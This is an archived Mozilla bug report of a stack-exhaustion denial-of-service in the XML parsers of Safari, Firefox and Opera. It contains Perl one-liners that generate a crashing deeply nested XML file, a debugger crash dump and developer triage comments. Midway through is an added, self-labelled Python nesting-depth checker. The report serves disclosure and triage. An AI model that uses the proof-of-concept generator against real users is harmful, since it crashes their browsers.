Closed Bug 547226 Opened 15 years ago Closed 15 years ago

Apple Safari, Mozilla Firefox and Opera browser Remote Denial of Service

Categories

(Core :: Layout, defect)

defect
Not set
critical

Tracking


RESOLVED DUPLICATE of bug 485941

People

(Reporter: advisories, Unassigned)

Details

(Keywords: testcase, Whiteboard: [sg:dos] stack-overflow)

Attachments

(2 files)

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)
Build Identifier: Mozilla Firefox 3.6

III. DESCRIPTION
-------------------------
The XML parsers of the Safari, Firefox and Opera browsers are affected by a Stack Exhaustion (Stack Overflow) due to incorrect handling of XML files, resulting in a remote denial of service, crashing the affected user's browser.

IV. PROOF OF CONCEPT
-------------------------
$ perl -e 'print "<?xml version = \"1.0\"?><root><element>" . "<x>y"x30000 . "</element></root>"' > poc.xml

or simply:

$ perl -e 'print "<x>y"x30000' > poc.xml

(Opera crashes at ~7K, Safari at ~9K and Firefox at ~30K)

[...]

+ Firefox 3.6 on Windows XP SP2:

(dfc.f14): Stack overflow - code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0332e348 ecx=054d0550 edx=036ee700 esi=00000000 edi=0332e348
eip=100f1338 esp=00033000 ebp=00000000 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Archivos de programa\Mozilla Firefox\xul.dll -
xul!NS_Realloc_P+0x3f68:
100f1338 56              push    esi
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
0:000> !analyze -v
(...)
FAULTING_IP:
xul!NS_Realloc_P+3f68
100f1338 56              push    esi

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 100f1338 (xul!NS_Realloc_P+0x00003f68)
   ExceptionCode: c00000fd (Stack overflow)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000001
   Parameter[1]: 00032ffc

FAULTING_THREAD:  00000f14

PROCESS_NAME:  firefox.exe

ADDITIONAL_DEBUG_TEXT:
Use '!findthebuild' command to search for the target build information.
If the build information is available, run '!findthebuild -s ; .reload' to set symbol path and load symbols.

MODULE_NAME: xul

FAULTING_MODULE: 7c910000 ntdll

DEBUG_FLR_IMAGE_TIMESTAMP:  4b5101ce

ERROR_CODE: (NTSTATUS) 0xc00000fd - No es posible crear una nueva página de seguridad para la pila.

EXCEPTION_CODE: (NTSTATUS) 0xc00000fd - No es posible crear una nueva página de seguridad para la pila.

EXCEPTION_PARAMETER1:  00000001

EXCEPTION_PARAMETER2:  00032ffc

DEFAULT_BUCKET_ID:  STACK_OVERFLOW

PRIMARY_PROBLEM_CLASS:  STACK_OVERFLOW

BUGCHECK_STR:  APPLICATION_FAULT_STACK_OVERFLOW_WRONG_SYMBOLS

LAST_CONTROL_TRANSFER:  from 00000000 to 100f1338

STACK_TEXT:
00000000 00000000 00000000 00000000 00000000 xul!NS_Realloc_P+0x3f68
(...)

[...]

V. BUSINESS IMPACT
-------------------------
Attackers can use this vulnerability to cause a remote denial of service to end users.

Reproducible: Always

Actual Results:
DoS web browser

VI. SYSTEMS AFFECTED
-------------------------
Tested latest version of each product, others may be affected:

Apple Safari 4.0.4
Mozilla Firefox 3.6
Opera 10.10
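An added defensive check, not part of this bug report and not code from any of the browsers named in it: a streaming, callback-driven XML scanner that refuses a document as soon as element nesting exceeds a configured limit, so input with the shape of the PoC above is rejected before it ever reaches a recursive parser or layout path. The limit of 256 and the chunk size are assumed values; the sample documents are constructed here to mirror the PoC, and the triage helper also separates "too deep" from input that is merely malformed.

```python
import xml.parsers.expat

DEFAULT_LIMIT = 256  # assumed policy value; the report does not specify one
CHUNK = 4096         # feed size: the limit trips long before the file is consumed


class NestingTooDeep(ValueError):
    """Raised as soon as element nesting exceeds the configured limit."""


def max_element_depth(data: bytes, limit: int = DEFAULT_LIMIT) -> int:
    """Return the deepest element nesting in data, or raise NestingTooDeep.
    expat is callback-driven and builds no tree, so the check runs in constant
    stack and bounded memory however deep the input is. Raising in the start
    handler stops the parser at once, well before EOF on a PoC-shaped file."""
    depth = deepest = 0

    def on_start(name, attrs):
        nonlocal depth, deepest
        depth += 1
        if depth > limit:
            raise NestingTooDeep(f"element depth {depth} exceeds limit {limit}")
        deepest = max(deepest, depth)

    def on_end(name):
        nonlocal depth
        depth -= 1

    parser = xml.parsers.expat.ParserCreate()
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    for offset in range(0, len(data), CHUNK):
        parser.Parse(data[offset:offset + CHUNK], False)
    parser.Parse(b"", True)  # EOF: unclosed elements surface here as ExpatError
    return deepest


def classify(data: bytes, limit: int = DEFAULT_LIMIT) -> str:
    """Triage verdict for one document: 'ok', 'too-deep' or 'malformed'."""
    try:
        max_element_depth(data, limit)
    except NestingTooDeep:
        return "too-deep"
    except xml.parsers.expat.ExpatError:
        return "malformed"
    return "ok"


def nested_doc(n: int, closed: bool) -> bytes:
    """Constructed sample with the PoC's shape: n nested <x> elements; closed=False
    leaves them unterminated, exactly as the one-liner in the report does."""
    body = b"<x>y" * n + (b"</x>" * n if closed else b"")
    return b'<?xml version="1.0"?><root><element>' + body + b"</element></root>"
```

Because the limit is enforced from the start-element callback, the unterminated 30000-element variant is refused during the first 4 KiB chunk, while a shallow but unclosed document is reported as malformed only when the final chunk is flushed.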
Attached file PoC
PoC per comment 0.
Attached file PoC 2
Other PoC from comment 0.
This would be [sg:dos] anyway, but I can't confirm the crash. Both testcases give me an XML parser error, so I'm not even getting to the stack exhaustion part. I'm going to unhide this as we have a number of similar bugs such as bug 485941.
Group: core-security
Component: General → XUL
Keywords: testcase
Product: Firefox → Core
QA Contact: general → xptoolkit.widgets
Whiteboard: [sg:dos] stack-overflow
Isn't this just a duplicate of bug 485941? Reed, why did you move this to XUL? There's no XUL involved here (other than libxul, which is just the layout/dom/etc library).
(In reply to comment #4)
> Isn't this just a duplicate of bug 485941?

If it is, please feel free to mark it as such.

> Reed, why did you move this to XUL? There's no XUL involved here (other than
> libxul, which is just the layout/dom/etc library).

My apologies. I assume the correct component would be Core :: Layout then?
Yeah.
Status: UNCONFIRMED → RESOLVED
Closed: 15 years ago
Component: XUL → Layout
QA Contact: xptoolkit.widgets → layout
Resolution: --- → DUPLICATE